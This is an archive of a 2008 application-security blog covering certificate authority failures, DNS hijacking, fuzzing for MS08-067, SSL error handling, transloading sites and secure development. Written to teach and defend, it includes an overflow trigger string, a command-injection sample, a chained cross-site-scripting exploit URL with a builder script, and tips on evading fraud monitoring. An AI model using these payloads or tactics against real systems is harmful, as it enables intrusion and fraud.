Wednesday, December 31, 2008

More than one way to skin a CA

Alex Sotirov, Jacob Appelbaum, and crew did some awesome work. They showed that it was possible to exploit RapidSSL's use of MD5 for signing certificates in order to create their own rogue CA signing certificate. This exploitation is many orders of magnitude more severe than when I used a loophole to get the login.live.com certificate from Thawte.

So what should happen when a CA screws up? Last summer, folks thought that the CA which issued the login.live.com certificate should have its status as a trusted CA revoked. I'm sure people feel the same way about RapidSSL. In my opinion, they are correct. However, it is clear that this could not happen, as it would affect the millions of businesses that rely on these CAs being trusted, which is what a VP at Verisign reaffirms in the comments of this post.

A different question that Appelbaum asked during the presentation in Berlin, and one I've asked many times during my research of Certificate Authorities, is: if we were able to do this, how do we know if anybody else has done the same thing?

No one can ever give a straight answer. I've responsibly reported a number of flaws to CAs; flaws that can allow people to get certificates that they shouldn't be allowed to get. The flaws get fixed, and that's great, but the damage that could have already been done is immeasurable.

It sucks when an online retailer gets hacked one or even multiple times. It's bad for them, and it's bad for their customers. When a trusted CA gets hacked, it sucks for the ENTIRE INTERNET. The CAs are supposed to help us secure the Internet. What does it mean if they are not secure themselves? To me, it means that we can't rely on trusted third parties.

I know that abandoning PKI and trusted third parties is a bad idea, and probably won't happen. However, people need to be more involved in the process of making trust decisions when communicating online. And I don't mean little yellow locks and green address bars. I have some ideas on how to make better use of SSL in web browsers and other SSL clients. So far, I've gotten mixed responses to them from my peers :-) However, with what the Sotirov/Appelbaum team accomplished, maybe my ideas will make more sense. Stay tuned...


(Cross post on PhishMe)

Tuesday, December 9, 2008

You don't need to be a hacker to abuse DNS

This morning I woke up, took a shower, and went straight to my laptop to let everyone on Twitter know that I had made it through another night, and had even decided to bathe. Unfortunately for me and my loyal followers, Optimum Online had some tricks up its sleeve. It seemed that my DNS servers could not resolve www.twitter.com or twitter.com. Hmm. Check out Google. It's up. CNN? Up. Log on to EVDO, Twitter is fine. What the heck?

This DNS error was not like any I was used to seeing. I wasn't getting a vanilla browser message saying the page could not be displayed. No, I was getting an Optimum-branded page telling me that the "domain could not be found." Fortunately, the page offered me a variety of SPONSORED and pay-per-click links that I could burn some time clicking on. Of course, when you follow the links that actually go to Twitter, DNS still would not resolve, and I'd end up on the same "domain not found" page, where I could click on more links and generate more cash for Optimum Online.

Optimum better shape up. FiOS is in town now, and I don't like it when my ISP earns cash when its DNS servers screw up. Let alone the thought that they could intentionally force DNS glitches in order to generate some fast cash via sponsored links. What a racket!

Let's not forget about the bad habits this teaches end users. "The server you were looking for cannot be found, so click on these links instead." I can't wait until I see a message like that on my bank's web site!

Who thinks ISPs would not stoop so low as to launch DNS attacks against their own customers? As far as I'm concerned, that's what Optimum did to me.

Friday, December 5, 2008

CheckFree.com owned; SSL, little yellow locks surrender.

A Washington Post blogger reports that the CheckFree.com domain name was hijacked. CheckFree is an online bill pay solution which many banks use to provide customers with a convenient method of making payments online. Apparently, attackers took control of the domain name by obtaining CheckFree's credentials for their domain registrar account at Network Solutions. They were able to simply change the name servers for CheckFree.com (as well as any other CheckFree domain), redirecting all users to attacker-controlled web servers hosting malware and serving self-signed certificates.

On Slashdot, one person mentions that they were served a self-signed certificate when they clicked through to CheckFree from their bank. This attack could have been even nastier if the attackers had procured a legit CA-signed certificate. Maybe the Network Solutions credentials also worked for CheckFree's Equifax Secure/GeoTrust account (check out the cert for https://mycheckfree.com). If they had a valid cert and weren't hosting malware, who knows how long the hijacking could have lasted. All CheckFree traffic could have been routed through the attacker servers in plain text. Scary.

Friday, October 24, 2008

Fuzzing and MS08-067

Yesterday was pretty exciting. I'd been looking forward to it for quite some time, as it was my turn to lead the penetration testing/exploit dev class at NYU Poly. My subject for the class is fuzzing, and the first part consisted of a lecture on fuzzing history and methodologies followed by demos of COMRaider, AxMan, and a video of an ActiveX exploit. I think the students are going to have some fun with ActiveX this week :-) Next week we'll be going over SPIKE in-depth.

What made the day more special was that I got to lead such a class while the rest of the infosec world was busy either patching MS08-067, or reversing it. This bug, found being exploited in the wild, ended up being a pre-auth stack overflow in a Windows RPC service. Precisely the kind of low-hanging fruit that Microsoft's SDL initiative, which includes fuzzing, was designed to stomp out. In fact, in a post-mortem write-up by Michael Howard (the man behind SDL), he says:

"I'll be blunt; our fuzz tests did not catch this and they should have."

Howard doesn't go into detail about why fuzzing didn't work, which leads me to hypothesize the following:

1. The vulnerable function wasn't fuzzed at all.
or
2. The vulnerable function wasn't fuzzed correctly. According to the two Stephens, passing a string like \aaa\..\..\..\f is enough to trigger the overflow in the vulnerable function (which canonicalizes paths). The overflow occurs when there are not enough directories specified in the string to match the number of ..'s.

If the fuzzing engine used to test this function was not aware of the expected format of the string, it could have just passed in a large string of A's, or perhaps a long string of random characters. Since such data would not be a valid path that requires canonicalization, the overflow would not occur, and the bug would go undetected.

The lesson here is to think carefully about fuzzing strategies. It is not unreasonable to send a large string of static or random characters while fuzzing a target with an unknown code base. However, in this case we are talking about white-box fuzzing, since MS was fuzzing their own code. The fuzzer should have been given some knowledge of the data expected by the function. It would have been trivial to create fuzz strings of mangled and malformed paths that would have triggered this bug. The problem is simply that this didn't happen (at least, not when MS fuzzed it).
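
To make that concrete, here is a minimal sketch of format-aware fuzz case generation for a path canonicalization routine, written in Python. The canonicalize_path harness hook is hypothetical; the point is that the cases are shaped like paths, with more ..'s than directories, rather than random bytes.

# Minimal sketch of format-aware fuzz case generation for a path
# canonicalization routine. canonicalize_path is a hypothetical hook
# into the code under test.
import itertools
import random
import string

def random_label(max_len=8):
    """Return a random directory name."""
    return ''.join(random.choices(string.ascii_letters, k=random.randint(1, max_len)))

def path_cases(max_dirs=4, max_dotdots=8):
    """Yield paths where the number of '..' segments can exceed the
    number of preceding directories -- the condition that reportedly
    triggers the MS08-067 overflow."""
    for n_dirs, n_dots in itertools.product(range(max_dirs + 1), range(1, max_dotdots + 1)):
        dirs = [random_label() for _ in range(n_dirs)]
        yield '\\' + '\\'.join(dirs + ['..'] * n_dots + ['f'])

for case in path_cases():
    print(case)                  # e.g. \aaa\..\..\..\f
    # canonicalize_path(case)    # hypothetical call into the target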

Thursday, September 11, 2008

The no-exploit exploit

Dean wrote a cool post on how to drop and run .EXEs on a client just by getting them to view a web page in Internet Explorer. Yay ActiveX!

The link: http://carnal0wnage.blogspot.com/2008/08/owning-client-without-and-exploit.html

Tuesday, September 2, 2008

iTunes and Vague SSL Error Messages

After reading Dan's recent blog posts, I started poking around and checking out how some other non-browser SSL clients handle invalid certificates.

First up: iTunes. I fired up TSeeP with a self-signed certificate, and started MITMing phobos.apple.com. The result:



Hmm. Pretty vague. Error -9812.

Next, I tried my trusty revoked login.live.com cert, just to see what would happen. The revoked certificate generated:



Error -9808. Another vague one. OK, let's Google "itunes 9808".

First hit: http://soccerislife8.blogspot.com/2008/02/itunes-error-9808.html
That page tells you to follow another link to: http://techupdate.blogvis.com/2008/02/09/itunes-error-9808/

The second link is where the "fix" for error 9808 is. From the blog post:
Also under Security make sure that the “Check for server certificate revocation (requires restart)” is unchecked. Then click ok and fire up iTunes.

One of the many comments:
I had the same problem and unchecked the “Check for server certificate revocation (requires restart)”.

It works. Thank You.

Judging by the comments, plenty of folks will come across such a vaguely worded error message, look to Google for help, and follow these instructions without a second thought that they could be degrading their own security.

In short, if you're responsible for an application that acts as an SSL client, it is not enough to just perform certificate validation. When certificates turn out to NOT be valid, you need to act appropriately, prevent the connection, and WARN the user.

A better version of the iTunes invalid cert message:

"SECURITY WARNING: There has been a problem validating the identity of an Itunes server. If you are using a public network, please connect to the Internet over a trusted connection such as your home or office network, and try again. If problems persist, reach out to your technical support contact for your Internet connection."

Monday, August 25, 2008

Domain Validated SSL Certificates

Regarding the SSL certificate I procured from a major Certificate Authority, the following two measures would have helped prevent the certificate from being issued.

1. An automated connection outbound over SSL to login.live.com (using a secured DNS server).
If this had been done, it would have been obvious that the domain already had a valid, non-expired certificate. Why would Microsoft need another one? This should have raised a red flag (see the sketch after this list).

2. Actual domain validation (DNS poisoning was not used).
WHOIS information was simply disregarded. It also appears that it was a person who messed up, not necessarily a system. Awareness training is always a good thing. The scariest part was that the people I spoke to on the phone saw nothing wrong with what I was requesting.
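
A minimal sketch of the automated check from point 1, in Python (domain illustrative): connect out to the domain being requested and see whether it already serves a valid, unexpired certificate.

# Minimal sketch of a pre-issuance sanity check: does the domain
# already serve a valid, unexpired certificate?
import socket
import ssl
import time

def has_valid_cert(domain, port=443):
    ctx = ssl.create_default_context()
    try:
        with socket.create_connection((domain, port), timeout=10) as sock:
            with ctx.wrap_socket(sock, server_hostname=domain) as tls:
                cert = tls.getpeercert()
    except (ssl.SSLError, OSError):
        return False   # no cert, or one that fails validation
    return ssl.cert_time_to_seconds(cert["notAfter"]) > time.time()

if has_valid_cert("login.live.com"):
    print("Red flag: this domain already has a valid certificate.")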

I don't want to name the CA who messed up - that won't help anyone.

I will, however, give props to a CA who did a great job. It may have just been one guy there who saw the badness, but he promptly called me with a loud and direct WTF?!

"There is no way we can give you that certificate", he told me. Way to go Digicert!

Tuesday, August 19, 2008

Strydehax the Olympics!

My buddy strydehax put a couple of hours into investigating the controversy surrounding the age of Chinese gymnasts. Check it out here.

NYSEC, OWASP Chicago

I'm off to NYC for NYSEC tonight, and tomorrow I'm off to Chicago for some work and some play. I was originally going to Chicago to hang out with my buddy, but coincidentally, there is a local OWASP chapter meeting on Thursday. Even cooler is that Rohyt had been scheduled to speak there, so I also get to go show some support for Intrepidus.

In other news, I'm finally starting to get caught up with work and back in the swing of things after Vegas. I'm continuing with more SSL VPN research, as well as some generic SSL research to follow up my login.live.com stunt. Unfortunately, I have more ideas than I have time to research them.

Thursday, August 7, 2008

SSL VPN Slides - BlackHat 2008

Yesterday I delivered my presentation on web based SSL VPN security at BlackHat in Las Vegas. The slides can be viewed here.

Thanks to all who attended my presentation. I'll be writing a paper soon to highlight the major points, so stay tuned for that.

Wednesday, July 2, 2008

Thoughts on IE8

I read quite a bit of stuff on the IE8Blog today. Most interesting to me are the improvements surrounding ActiveX controls. Among the big changes here are Per-User (non-Admin) controls and Per-Site Controls.

Per-User Controls can be installed by standard users without the need to elevate privileges. Administrative rights will no longer be required because the control will only exist within the profile of the user who installs it, preventing exploitation of other users of the system.

More importantly, Per-Site Controls allow users to whitelist certain sites to use certain controls. This is a great breakthrough in the fight against ActiveX re-purposing attacks, where malicious web sites abuse functionality in legitimate controls. Where security-conscious developers once had to maintain their own white-listing code within the control, IE8 will do this for them by default.

This is great for complex web applications (like SSL VPNs) that use ActiveX controls to perform sensitive/dangerous actions on the client. Unfortunately, there are still many organizations out there that haven't even embraced IE7 yet, so these defenses may not help the users who really need them for quite some time.

On the XSS front, IE8 will also have a few new tricks. One of them is a client side black-list XSS filter (like a wimpy NoScript) that will block attacks and notify users. Unfortunately, to avoid "breaking the web", it appears from this post that the filter will only block the most obvious SCRIPT tag injections.

Another new feature is the toStaticHTML() JavaScript method. This looks like another blacklist, but is intended to allow a web site to render third-party Web 2.0 content safely in the browser. Hopefully it uses a robust blacklist!

Another new feature that I'm really excited about is domain highlighting. In order to prevent phishing and other social engineering attacks, IE8 will highlight what it determines to be the owning domain name in the address bar. Anything site controlled, like sub-domains and URL text, will be grayed out, so that the user can more easily key in on the important parts: the protocol and domain name. Simple, but effective.

Thursday, June 19, 2008

Recent OWASP Events

Last week I presented at FROC.us and my demos worked fine. Last night at the OWASP NY/NJ chapter meeting my demos failed hard! Fortunately for me, everyone was very nice and understanding, and the presentation was able to hold its own without the demos. Thanks to everyone who came out to both of these events!

You can view my slides here:


FROC.us - SSL VPN Security (different from what I'll be presenting at BlackHat)

June 18, 2008 OWASP NY/NJ - Reverse Proxy Abuse

Here are videos of the demos I tried to show last night:
Abusing XMLHTTP for local resource access
Exploiting 5 WebApps with 1 HTTP Request

I had some resolution issues that prevented me from getting them up on YouTube, but I'll try again later when I have more time.

Thursday, June 5, 2008

CAPTCHAs anyone?

Man Allegedly Bilks E-trade, Schwab of $50,000 by Collecting Lots of Free 'Micro-Deposits'

Talk about abuse of functionality! Doesn't look like this guy did much to fly under the radar either. He was opening THOUSANDS of accounts per day with these brokers. In some cases, he even linked fraudulent accounts and accounts opened with his real personal details to the same bank account.

The best part, in my opinion, is that he did the same thing with the Google Checkout service, seemingly within their terms of service:

"When the bank asked Largent about the thousands of small transfers, he told them that he'd read Google's terms of service, and that it didn't prohibit multiple e-mail addresses and accounts. 'He stated he needed the money to pay off debts and stated that this was one way to earn money, by setting up multiple accounts having Google submit the two small deposits.'

The Google caper is not charged in the indictment. (.pdf)"

Monday, June 2, 2008

[insert interesting title here]

I guess you could tell by my lack of posts that I've been pretty busy recently. Fortunately, it's been mostly with fun and interesting things.

One of the projects I've been working on is reversing a patched SSL VPN ActiveX component in preparation for my BlackHat talk. I've been staring at Olly and IDA until my eyes feel like they're going to bleed. But, I've been making progress, learning a lot, and I've come up with some additional material to talk about. One such topic is that of hard-coded passwords in binaries. Jeez. If you work for a security product vendor, you should know better!
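
As an aside, a first pass at finding hard-coded secrets doesn't even need a disassembler. Here is a minimal sketch in Python (keyword list illustrative) that pulls printable strings out of a binary, the way the Unix strings tool does, and flags suspicious ones:

# Minimal sketch: extract printable ASCII runs from a binary and flag
# candidate hard-coded credentials. The keyword list is illustrative.
import re
import sys

KEYWORDS = (b"passw", b"secret", b"key", b"token")

def strings(data, min_len=6):
    """Yield printable ASCII runs of at least min_len bytes."""
    for match in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield match.group()

with open(sys.argv[1], "rb") as f:
    blob = f.read()

for s in strings(blob):
    if any(k in s.lower() for k in KEYWORDS):
        print(s.decode("ascii"))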

I've also been getting ready for my first SSL VPN talk next week at Froc.us. I have some cool stuff to share with those folks, and it should be a good time. Plus, I've never partied in Denver before. Looking forward to seeing a new city.

Friday, May 16, 2008

Black Hat USA 2008

I have some exciting news. Well, exciting for me anyway :-)

I was accepted to speak at Black Hat 2008 this summer in Las Vegas. You can read my abstract here. I'm in the network track (since I'm talking about SSL VPN) but rest assured there will be a ton of application security content in my talk.

A lot of big names in the security space will also be speaking there, and it's an honor to be included among them.

Wednesday, May 14, 2008

Changing target landscapes

Dancho Danchev asks if the recent mass SQL injection attacks are intended to steal databases from vulnerable sites, or if they are being used to build a network of compromised hosts for later attacks. I would just assume that an intelligent attacker would do both.

As popular targets harden, attackers will adapt and look for ways to exploit less popular targets en masse. While it may have been easy a few years ago to compromise one valuable target, today it might be easier (and safer) for an attacker to compromise 100 smaller targets and get the same value.

As the target landscape changes, attacks and tool kits will mature, making it easier to automatically compromise sites using a wide range of vulnerabilities. A few years ago, we had big compromises at large organizations like TJ Maxx. Today, we see more attacks targeted at smaller organizations, like the most recent one I know of at multiple locations of a popular restaurant chain in the states.

In the same way new and expensive technologies trickle down from the largest companies that can afford them, the attackers will trickle down from the hardened juicy targets to the smaller and softer, yet more prevalent, targets.

Tuesday, May 6, 2008

A Dynamic Approach to Static Analysis

The following is intended for people who want to do things differently, and see an improvement in the security of their web applications. If you are looking for an acronym and a quick fix to get insecure code fast-tracked into production so you get a bigger bonus, go here.

The problem with static analysis tools is not false positives. It's also not getting code to compile, or integrating source code scanning into the nightly/weekly/monthly build process. These are limited, one-time challenges that can be overcome with a few days, sometimes just hours, of work by a capable individual.

In my opinion, the problems that hamper the success of static analysis tools are:

1. Management sees source code scanning as a panacea, and lacks an understanding of the business process changes needed to support static analysis in a large development organization.

2. Developers are often not trained to fully understand the findings the tools provide, and are not given the resources and education required to fix bugs or alter bad development practices.

Management likes to know about the badness in their apps, and the pretty graphs and reports that the tools can generate make them feel like they have a handle on things. Unfortunately, the 1500 cross site scripting vulnerabilities in the report won't disappear unless the developers have time to fix them.

Making the vulns disappear from the chart might make management feel warm and fuzzy, but if they are merely obfuscated such that the tool doesn't see them, everyone is even worse off than before. That's why it's important that your developers know how to properly fix the problems. A black-listing routine may trick your static analysis tool, but it won't trick a pen-tester - or an adversary.

The first time you scan your code and find that you have a gazillion cross site scripting vulnerabilities, your first priority should not be to put the static analysis tool on everyone's desktop, or to configure nightly automated scans. If you want to make some serious improvements to your code base, try following these three steps:

Step One - Get Help
Hire a security architect - or bring in a consultant - to help you understand how the security issue affects the application as a whole, as opposed to individual lines of code. When you realize that the application fails to properly sanitize input across the board, you can develop remediation plans that solve the problem across the board (like secure APIs - see the sketch below).
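
As one illustration of what a secure API can look like, here is a minimal sketch in Python (function names illustrative) of a centralized output-encoding module; one audited implementation replaces ad-hoc escaping at every sink:

# Minimal sketch of a centralized "secure API" for output encoding.
# Developers call these instead of hand-rolling escaping at each sink.
import html
import re

def encode_for_html(value):
    """Encode untrusted data for an HTML element context."""
    return html.escape(value, quote=True)

def encode_for_html_attribute(value):
    """Stricter: encode everything but alphanumerics, for quoted
    HTML attribute contexts."""
    return re.sub(r"[^a-zA-Z0-9]",
                  lambda m: "&#x%02x;" % ord(m.group()), value)

# Usage at a sink:
# out.write("<td>" + encode_for_html(user_supplied) + "</td>")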

Step Two - Get Resources
Make management aware of the problem and how it is costing them money. Exploit vulnerabilities in the application in front of them. Show them how YOU can hijack THEIR account. When you do this, you need to also describe your remediation plan, and let them know the resources you need to make things right. Show them how efficiently you can standardize input validation using a secure API. Your consultant or architect should be able to help you here. If not, get a new one!

Step Three - Get Results
Once management has eagerly met your demand for resources, train your developers. Exploit the same vulnerabilities in front of them that you showed management, but also show them where the problem exists in the source code. Show them how easy it is to fix each vulnerability with the secure API! Send them off to review and fix their own code. Follow up with a static analysis scan in a week or two.

After your first round of step three, you should see a sharp decline in the number of vulnerabilities. Let your developers know the good news, and keep repeating step three until input validation problems are a thing of the past!

After that, you can focus on things that static analysis tools are not good at finding - like access control issues in your business logic.

Friday, May 2, 2008

Transloading? WTF!

Some research I've been doing led me down an interesting path. The path of the WebTV user (or Webbie). I've never used or seen a WebTV, but I've come across a number of sites the past few days that INSIST I browse them from a WebTV or they will not let me in :-)

Anyway, the sites I've been exploring are called "transloading" sites. Transloading is when you tell ServerA.com to fetch a URL from ServerB.com, and store it on ServerC.com. WebTV users need this, I presume, because either they can't store files locally and then upload them, or it is just a big PITA.

The fetching part is the normal application/proxy stuff I usually rant about. The storage part is a little more interesting. All of these sites request an FTP host, username, password, an optional new name for the file, and sometimes even a desired permission level to set on the new file. Forget about the fact that none of them use SSL when transmitting these credentials. Forget, again, that this type of site reinforces bad habits that lead to people getting phished.

The scariest part is that some of these sites are also pretty good at spitting out the command line results when they attempt to FTP to your specified host. There seem to be some pretty obvious command injection vulnerabilities in many of them. So even if you're a shrewd "webbie" who trusts the person hosting the transloading script, their box could easily be compromised and your FTP creds harvested by someone else.
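
To illustrate the command injection risk - a hypothetical reconstruction, since I don't have the actual CGI script - compare interpolating the user-supplied FTP fields into a shell command with passing them as discrete arguments:

# Hypothetical reconstruction of the transloading bug class. The tool
# name and flags are illustrative; the point is the shell boundary.
import subprocess

host = "ftp.example.com"
user = "webbie; id"        # a malicious "username" smuggling a command
password = "hunter2"

# VULNERABLE: the shell parses the user-controlled fields, so "; id"
# (or backticks, $(...), etc.) runs arbitrary commands on the server.
# subprocess.run("ftpput -h %s -u %s" % (host, user), shell=True)

# SAFER: discrete argv entries are never parsed by a shell.
subprocess.run(["ftpput", "-h", host, "-u", user], input=password.encode())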

Many of the transloading sites actually seem to use the same CGI script to do their job. I haven't been able to locate a copy of this script, but I haven't tried too hard to find it either. If you want to know more about transloading, check out Beth's site.

Tuesday, April 15, 2008

Worm-like Intranet/Proxy Hacks

Remote file include worms are nothing new. Santy worm, for example, abuses PHP applications that allow user specified locations to be passed to require() and include() functions. When attacker controlled URLs are passed to these functions, the attacker can serve code to the application which will then be executed on the victim server.

Intranet hacking vulnerabilities, like the one RSnake recently found, share some characteristics of these vicious PHP application flaws. Both flaws take user specified resources and fetch them automatically without any validation. This means you can tell the application to go get http://www.cnn.com, or http://localhost/app/web.config, and the application will generate an HTTP request for that resource.

What sets the two issues apart is that the PHP vulnerability consists of an automated request AND arbitrary code execution - that's why it is so easily wormable. Intranet-hacking type vulnerabilities, in general, only provide an attacker a method to automate and proxy requests (propagation), without any vector for remote code execution. Unless there is some other vulnerability in the same script...

If the same URL that has the arbitrary request vulnerability also has a persistent XSS, SQL injection, or command injection vulnerability, you now have a vector to execute malicious code, as well as a method to propagate it.

Below is one theoretical example. But first, let's get some assumptions out of the way :-)

Assumption 1: The application has a pre-auth vulnerability allowing users to specify URLs which the application will fetch without validation.

Assumption 2: The same code that doesn't validate the user specified URL also doesn't validate other querystring data it is sent.

Assumption 3: All querystring data gets written to a log or database, without being encoded, where it can be viewed in a web browser by an administrator or some privileged user.

Initial attacker generated request:
http://somewebapp/app/fetch?path=[URL]&XSSpayload=<script>alert(document.cookie)</script>

In the above request, [URL] = http://someotherwebapp/app/fetch%3Fpath%3D[URL2]%26XSSpayload%3D<script>alert(document.cookie)</script>

[URL] contains the first automated request that will be generated, [URL2] contains the next one, and so on . . .

Another differentiator is that while the malicious PHP worm code can find targets on its own using Google searches, with Intranet hacking it is up to the attacker to identify targets and build his exploit URL. In the end, he'll have a very long URL that contains the target and payload for every server he wishes to attack. Not pretty, but it should get the job done.
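
A minimal sketch in Python (target list and parameter names taken from the example above) of building that nested URL: each layer is percent-encoded so every vulnerable hop decodes exactly one level before forwarding.

# Minimal sketch of building the nested exploit URL from the example
# above. Each layer is percent-encoded so each hop unwraps one level.
from urllib.parse import quote

PAYLOAD = "<script>alert(document.cookie)</script>"
targets = [
    "http://somewebapp/app/fetch",
    "http://someotherwebapp/app/fetch",
    "http://thirdwebapp/app/fetch",    # ...and so on, per target
]

url = ""  # the innermost hop gets an empty path= value
for target in reversed(targets):
    url = "%s?path=%s&XSSpayload=%s" % (target, quote(url), quote(PAYLOAD))

print(url)  # one very long URL carrying target + payload for every hop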

Something else to be aware of is the execution path of the victim code. When the code makes the remote request, it will probably hang until it gets a response, or until it times out (depending on how many requests are made and how long it takes for them to be fulfilled).

If, in our above example, the persistent XSS is written to the database before the request is made, your attack should still work. If it is written to the database after the HTTP request, you could be out of luck if the request times out and the code takes an alternate execution path.

Again, this is all theory. Next step would be a PoC . . . or maybe actually find something like this in the wild.

Monday, April 14, 2008

TCP MITM Tools

I wrote a post on the PhishMe blog about a tool I'm building. Check it out here.

It's basically a TCP proxy that allows you to intercept/modify all application traffic sent via TCP and SSL, regardless of application protocol (HTTP/SOAP/proprietary stuff). It has helped me out quite a bit on some projects, so I'm curious to see if the rest of the world will find it useful!

Thursday, April 10, 2008

Front Range Web Application Security Summit

On June 10th, I'll be speaking in Denver at the Front Range OWASP Web Application Security Summit. My topic will be abusing SSL VPN client/servers and open reverse HTTP proxies. I'll be talking about a lot of what you've read here, as well as demoing some PoCs and exploits. Check it out here: http://www.froc.us

Also on the bill are Jeremiah Grossman, RSnake, and Ed Bellis, a CISO for Orbitz World Wide. Looks like there will be a wide range of interesting tech and management subject matter!

Tuesday, April 8, 2008

Preventing BlackHat Automation

Yesterday on PhishMe, I talked about my trip to Chicago to visit my good friend Sachin. While out there, we hung out with his buddy John who works for a small web design firm. John's firm sells quite a few e-commerce sites, and he had an interesting tale of a DoS attack against one of their client sites.

Except, DoS wasn't the intended purpose of the attack. The attackers were actually abusing the web application to scrub a list of credit cards in order to figure out which ones were good. The DoS occurred when Authorize.NET stopped accepting transactions from the site, preventing legit customers from making purchases.

Their immediate solution was to block the offending IP which stopped the attack. But the vulnerability still existed in the application, so they put in further validation, the details of which we didn't really get into.

I made the argument that no matter what kind of validation you put in place, you still need to let anonymous users place orders with credit cards. Additionally, you can't effectively block malicious users from placing an infinite number of orders because:

1. Malicious users can utilize open proxies, preventing IP filtering.
2. Malicious users can utilize multiple identities and credit card numbers, so you can't just block John Q. Hacker.
3. Limits on sessions won't help, since attackers can just get new session tokens.

John pretty much agreed, and added that they now have an added sense of vigilance and more actively monitor usage of their sites. Unfortunately, this monitoring is all done manually, which doesn't make for a scalable solution.

Monitoring, both manual and even automated, is also only effective against stupid attackers who don't throttle and/or don't make an effort to make their HTTP requests look legit. A savvy attacker should be able to randomize the time between his automated requests, as well as automatically utilize a large number of open proxies to hide his true intentions. If the attacker does some homework and determines the number of legitimate orders a given web site handles per day, he should be able to throttle his requests such that no red flags will be raised.

Below is a list of possible countermeasures that could be deployed to prevent such abuse and automation.

1. Make the attacker, but not browser based users, jump through hoops. Enforce strict HTTP request validation on critical transactional URLs. Make sure any header a normal browser would send is present in the request (see the sketch after this list).

2. Reverse CAPTCHA. Build a response that a human can understand, but would be difficult for an automated bot to interpret. Show a picture of some dogs, and display a message to the effect of: "If you see 3 golden retrievers in this picture, your order was successful."

3. Use alternate communication channels for response data. An easy one would be to SMS the transaction result to a mobile number. Of course, you can't rely on all users being able to receive SMS...

4. Use a combination of numbers two and three, and make your process dynamic.
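
A minimal sketch of number one, in Python (the header list and handler names are illustrative): reject requests to a critical transactional URL that lack headers every mainstream browser sends.

# Minimal sketch of countermeasure #1: strict header validation on a
# critical transactional URL. Header list and handlers are illustrative;
# tune the list to what your real browser population actually sends.
REQUIRED_HEADERS = ("User-Agent", "Accept", "Accept-Language", "Referer")

def looks_like_a_browser(headers):
    """Cheap hoop: naive bots rarely bother sending all of these."""
    return all(h in headers for h in REQUIRED_HEADERS)

def handle_checkout(request):
    if not looks_like_a_browser(request.headers):
        return (403, "Order rejected.")   # make the bot author work harder
    return process_order(request)         # hypothetical normal flow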

There are two themes to these countermeasures:
1. Make your process complicated to automate.
2. Make your responses hard to interpret programmatically.

And one last idea. If you're content with monitoring for the time being, you still need to be able to react when you see someone doing something naughty. In the case of credit card validation abuse, an easy countermeasure would be the ability to quickly disable real-time processing. Your site will still be accepting orders, but they won't be processed until after human review.

Monday, April 7, 2008

Go PhishMe!

I've started writing on the PhishMe.com blog. You can read my first post here.

I'll still be writing on Schmoilitos Way, but I'm going to be writing about some new tools I'm developing on the PhishMe blog, so definitely keep an eye on it. The other guys on the Intrepidus team also have some really interesting/relevant/fun stuff to write about, so I'd recommend adding it to your feeds!

Cheers!

Friday, April 4, 2008

Defending your visitors

Last night I was hanging out with my friend Andy, who is a real estate agent here in Hoboken. I was shocked when he told me he read my blog, and blown away when he said he got some value out of it!

While not a tech guy, Andy handles most of his computer issues on his own. He also runs a simple web site he developed to promote his real estate listings. He is looking to add functionality to his site, and he found some individuals on guru.com who are bidding for the work. While his current web site and the work he needs done is not overly complicated, my last post (Outsourcing Pain) still struck a nerve with him.

Andy realized how easily he, his web site, and people who view his web site, could be taken advantage of by some mystery outsourcer. He still needs help getting his work done, but he will be a little more vigilant in choosing who does it for him.

One of the features Andy wants implemented in his site is form validation on some of the contact forms that users can fill out. I told him to make sure when he pays someone to do it, that they give him server side validation as opposed to client side JS validation. I gave him the usual appsec drill about injection attacks, and how no validation leads to compromised assets (data, server, etc). This led us to another great point in our discussion.

Andy asked: "What assets do I have? Why would anyone want to hack my rinky dink real estate web site?"

If Andy's web site was pwned, it wouldn't be a big hit to his wallet. It's not a major source of business for him. However, the people who view his web site - current and would-be customers - probably use their PCs for more than just browsing Andy's web site. They use it to check email, bank online, work, and all that good stuff.

So while hackers might not want to steal Andy's database, they would be more than happy to take control of his site in order to serve malware to his visitors and spam the rest of us with viagra emails and the like. The assets Andy's web site puts at risk may not necessarily be his own. A compromise of his site could lead to much frustration for his visitors, but not necessarily Andy himself.

Wednesday, April 2, 2008

Outsourcing Pain

I have some friends who own a small business together and are going through some outsourced development trouble. The business originally started with one owner in the U.S. and an outsourced Eastern Bloc developer responsible for all architecture and development. Together, they built a robust web app that was great for its intended purpose, and quite pleasing to the eye. The two had a great relationship, albeit one based on no more than a virtual handshake.

Things started to get sketchy when the owner, realizing he could only take the business so far, brought in partners and gave away equity. With the new partners involved, the original relationship with the developer started to sour. The developer responded by working directly for clients, raising his rates, and making himself scarce.

FUD

They asked me what the worst-case scenario would be if the relationship soured to the point where they no longer worked with this developer. They assumed he could take the source code, his knowledge of the source code, and start a competing firm. Since he is in a foreign country, and they have no written agreement at all, the partnership would be S.O.L. That is bad news.

While the above is true, I told them the really bad news. Since he is the only one who understands the code and was the sole person responsible for managing it, it would be good to assume that he knows backdoors into the app through which he can steal sensitive client data. They wondered why this is a "good" assumption. I explained that it is a good assumption because they have a chance to be proactive about it.

Take Back Control

The first thing they need to do is get a handle on the source code. They need to maintain a source code repository and make the outsourced developer use it. Once they have the source, they need to get a security consultant to review the code for security problems. Expensive, but necessary. Finally, they need to either formalize the relationship with this outsourcer or plan on moving to someone else.

In hindsight, it is easy to see how all the eggs were in one basket. Since all design, architecture, and coding was done by the outsourced resource, there was no internal knowledge of how the application actually worked. The developer had all the control. A simple solution would have been to hire one more outsourced resource, and split the workload between the two. This would have allowed an additional technical resource to develop over time, providing the owner with some stability in case the secret police came in the night and took the primary developer away.

For Next Time

If an individual were to ask me for advice on initiating an overseas outsourced development project, here are some tips I would give them.

1. Go with a legit company. Don't just pick some guy off rent-a-coder who you can only contact via IM and email. If you want a long term relationship, you will want to be able to speak with them.

2. If possible, go with a company that has a presence in your country. Not only does this mean you have someone to speak with during your own business hours, but you have someone you can more easily hold legally responsible if things don't work out.

3. Make sure the developers document their code.

4. Have a contingency plan if things don't work out. Try and establish a relationship with another development firm, or be prepared to hire an internal resource. Outsourcing can be a great value, but having an in-house resource can be invaluable.

5. Understand that security is important. Non-technical people can come up with great ideas for software. Unfortunately, when they have someone develop it, they look for functionality and turn a blind eye to security (actually, that sounds like a lot of technical people I know). Before you begin your project, check out OWASP, and at least talk to someone about application security - a friend, a consultant - anyone knowledgeable.

6. When you begin testing the application internally, pay a third party to perform a security assessment of it. This way you can report security issues to the developers in addition to the functional bugs you will be finding and reporting. It is more dollars up front, but it will be worth it in the long run. The sooner you address security, the cheaper it will be.

